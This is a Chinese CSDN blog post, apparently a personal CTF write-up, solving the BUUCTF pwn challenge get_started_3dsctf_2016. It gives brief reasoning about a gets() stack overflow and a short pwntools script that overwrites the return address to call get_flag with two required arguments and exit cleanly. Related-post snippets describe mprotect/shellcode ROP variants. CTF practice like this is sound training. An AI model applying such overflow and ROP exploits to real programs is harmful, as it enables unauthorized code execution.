get_started_3dsctf_2016

最新推荐文章于 2024-09-10 21:14:46 发布

_Nickname

最新推荐文章于 2024-09-10 21:14:46 发布

阅读量133

点赞数 3

分类专栏： Pwn buuctf 文章标签：服务器 linux 运维 CTF ctf

加油加油~

本文链接：https://blog.csdn.net/wcj126/article/details/140383819

版权

buuctf 同时被 2 个专栏收录

29 篇文章 1 订阅

订阅专栏

Pwn

7 篇文章 1 订阅

订阅专栏

checksec

没有栈保护,应该还是栈溢出

一般是先在main函数查找,看看整体逻辑

找到了get漏洞

注意啊注意!

这里这道题没有缓冲区

这是正常的题,这里有个s

但是这道题!

只有R没有s

这里有一个点,在函数构建的时候,我们返回函数这里是addr,在引用这个函数时,我们要马上接入他的返回函数,这里就是exit,然后再传参,之前的题没有这个因为没有正常结束不会有什么问题

from pwn import *
ghust = remote("node5.buuoj.cn",26779)
addr= 0x80489A0
exit_addr=0x0804E6A0
a1=814536271
a2=425138641
payload = b'a'*56 +p32(addr)+p32(exit_addr)+p32(a1)+p32(a2)
ghust.sendline(payload)
ghust.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

_Nickname

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF PWN get_started_3dsctf_2016

Rt1Text的博客

04-23

345

1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编该题没有用ebp寻址,用的是esp寻址也就是说不需要覆盖ebp四字节这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...

get_started_3dsctf_2016 题解

lifanxin的博客

12-11

1070

Write Up知识点关键字样本运行静态分析动态调试求解思路求解脚本知识点关键字栈溢出，ROP + shellcode 样本 get_started_3dsctf_2016样本下载运行检查文件: 32位小端程序；开启了NX保护，栈保护未开启。运行程序：静态分析动态调试求解思路求解脚本 ...

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF get_started_3dsctf_2016

zwb2603096342的博客

07-07

1080

mprotect的运用

BUUCTF get_started_3dsctf_2016（mprotect）

、moddemod

06-10

536

典型的栈溢出而且还留了后门在本地可以拿到flag.txt文件，但是远程不行！栈不可执行原型： int mprotect(const void *start, size_t len, int prot) start：需改写属性的内存中开始地址 len：需改写属性的内存长度 prot：需要修改为的指定值功能： mprotect()函数可以用来修改一段指定内存区域的保护属性。他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值： 1）PRO.

buuctf|get_started_3dsctf_2016 1

m0_64236521的博客

05-01

653

方法一我将文件下载后将其重命名为pwn_13，checksec一下可以直接栈溢出，32位，进入ida gets(v4)可以栈溢出，这里没找到后门函数，只发现了get_flag函数，进去看看只要a1,a2满足值便可以输出flag，a1和a2是函数参数，我们可以进行传入，同时为了让get_flag正常结束，我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu

get_started_3dsctf_2016【BUUCTF】(两种解法)

qq_41696518的博客

08-27

1309

get_started_3dsctf_2016

【BUUCTF-PWN】12-get_started_3dsctf_2016

燕麦葡萄干的博客

07-05

1080

垃圾数据–>mprotect函数地址–>三个连续的pop地址–>.got.plt表起始地址–>内存长度–>内存权限–>read函数–>三个连续的pop地址–>read函数的三个参数–> .got.plt表的起始位置。其中gets()函数存在栈溢出，溢出距离为0x38，这里是使用的esp寻址，属于外平栈，不需要覆盖ebp的四个字节。第二种是直接在IDA中查找，crtl+s调出程序的段表，这里还不太清楚怎么去选择可用的程序段，看很多博客都是直接用的.got.plt的起始位置。

[BUUCTF]PWN11——get_started_3dsctf_2016

mcmuyanga的博客

08-28

3852

[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址：https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤：第一个方法，本地打通，要自己创建一个flag.txt 例行检查，32位，开启了nx保护 nc一下，看看程序大概的执行情况 32位ida载入，shift+f12查看程序里的字符串，看到了flag.txt 双击跟进，ctrl+x查看哪个函数调用了它，发现了一个函数，当a1=0x308cd64f，a2=0x19

get_started_3dsctf_2016|get_started_3dsctf_2016

12-11

网络安全逆向PWN题目，简单的栈溢出，虽然有后门函数，但同时又给了一定的限制条件，可以使用更复杂的ROP解法。该样本题解：https://blog.csdn.net/A951860555/article/details/111030289

【BUUCTF - PWN】get_started_3dsctf_2016

古月浪子的博客

03-25

1553

checksec一下，可以栈溢出 IDA打开看看，一个很普通的栈溢出漏洞，有后门函数，应该说是一道非常简单的题了但是，本地打通非常容易，可是靶机打不通 =_= 于是乎，换个方法，利用mprotect函数修改bss段为rwx，写入shellcode跳过去执行 from pwn import * from LibcSearcher import * context.os='linux' con...

服务器环境搭建-5 Nexus搭建与使用介绍

Sheng_Q的博客

09-07

967

本文介绍nexus的安装、配置和使用，之后通过案例的方式演示包的使用过程(推送和下载)。

高防服务器的优势与劣势分析

2403_86998484的博客

09-10

359

高防服务器通过持续监控和快速响应网络安全事件，极大地减少了由于网络攻击导致的服务中断，从而确保了业务的连续性。在网络安全威胁日益增加的今天，保障数据的安全是企业信誉的重要部分。高防服务器通常需要更多的资源来维护其高级的安全功能，包括硬件和软件的配置。这使得高防服务器的成本远高于标准服务器，可能需要更多的初期和持续的投资。高防服务器要求专业的知识和技能来进行正确的配置和维护。为了实现强大的安全防护，某些安全措施可能会对服务器的性能产生影响，例如，高强度的流量过滤可能会导致处理速度变慢，影响用户体验。

Linux：五种IO模型

MaoRuofeng的博客

09-09

1096

阻塞IO: 在内核将数据准备好之前,系统调用会一直等待.所有的套接字,默认都是阻塞方式。非阻塞 IO: 如果内核还未将数据准备好, 系统调用仍然会直接返回, 并且返回EWOULDBLOCK 错误码。非阻塞 IO 往往需要循环的方式反复尝试读写文件描述符(对于CPU会有较大的浪费), 这个过程称为轮询。信号驱动 IO: 内核将数据准备好的时候, 使用 SIGIO 信号通知应用程序进行 IO操作。IO 多路转接: 虽然从流程图上看起来

web项目如何部署到服务器上呢？——麻烦的方法

m0_46977298的博客

09-10

431

web项目如何部署到服务器上呢？——麻烦的方法

Netty权威指南：Netty总结-编解码与序列化

Oceáno的博客

09-09

1397

TCP是流协议，也就是没有界限的的一串数据，底层并不知道上层业务数据的具体含义，也就是说一个完整的包可能会被拆分成多个包进行发送，也可能把几个小包封装成一个大的数据包发送。这就是拆包和粘包。

内网穿透之EW使用、判断服务器是否出网